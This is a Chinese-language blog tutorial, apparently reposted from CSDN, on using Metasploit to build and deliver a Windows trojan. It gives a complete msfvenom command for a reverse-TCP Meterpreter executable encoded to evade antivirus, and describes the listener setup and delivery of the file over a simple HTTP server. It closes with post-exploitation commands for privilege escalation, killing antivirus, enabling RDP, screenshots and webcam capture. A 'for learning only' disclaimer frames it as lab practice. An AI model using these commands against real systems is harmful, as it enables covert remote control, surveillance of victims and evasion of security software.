msf渗透练习-生成木马控制window系统

说明:
本章内容,仅供学习,不要用于非法用途(做个好白帽)

(一)生成木马

命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.23.46 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

-p:设置payload,也就是要生成的可执行文件的类型和功能,这里选择的是Windows Meterpreter反向Shell。

        LHOST:指定Metasploit服务器(kali)监听的IP地址,

        LPORT:指定Metasploit服务器(kali)监听的端口,

-e:指定加密算法,这里使用的是shikata_ga_nai,这是一个简单的Polymorphic XOR加密算法,用来避免反病毒软件的检测。

-f:指定生成的可执行文件的格式,这里选择的是exe格式。

-o:指定生成的文件名为shell.exe。

-i:指定加密算法的迭代次数,即对生成的payload进行几次加密。
 

整个命令的意思是,将生成一个Windows反向TCP Meterpreter Shell的可执行文件,通过Metasploit连接到指定的主机和端口,使用shikata_ga_nai算法进行多次加密,生成exe格式的文件,存储为shell.exe。

 

 (二)配置监控

1、启动msf :msfconsole

2、载入监控模块  :use exploit/multi/handler

3、加载payload

 
4、查看plyload需要配置的参数

5、设置plyload的参数


6、开始监听:run

(三) 传播木马

当通过各种方法,各种路径传播木马到目标主机之后,等待目标主机运行木马程序,我们就能控制目标主机

这里练习我就用http服务传播

1、开启http服务:

  python2 -m SimpleHTTPServer 80 

2、靶机访问kali地址,下载木马文件

3、当用户运行木马程序,就可以出现

(四)后渗透

当利用木马成功控制window之后,就可以干我们像干的事情了,(不能用于非法用途,做个好白帽)

 

 

还有一些命令:

查看进程:ps

查看当前进程号:getpid

查看系统信息:sysinfo

查看目标机是否为虚拟机:run post/windows/gather/checkvm

查看完整网络设置:route

查看当前权限:getuid

自动提权:getsystem

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议:run post/windows/manage/enable_rdp

列举当前登录的用户:run post/windows/gather/enum_logged_on_users

查看当前应用程序:run post/windows/gather/enum_applications

抓取目标机的屏幕截图:load espia ; screengrab

抓取摄像头的照片:webcam_snap

查看当前处于目标机的那个目录:pwd

查看当前目录:getlwd

猜你喜欢

转载自blog.csdn.net/weixin_49349476/article/details/131171211
今日推荐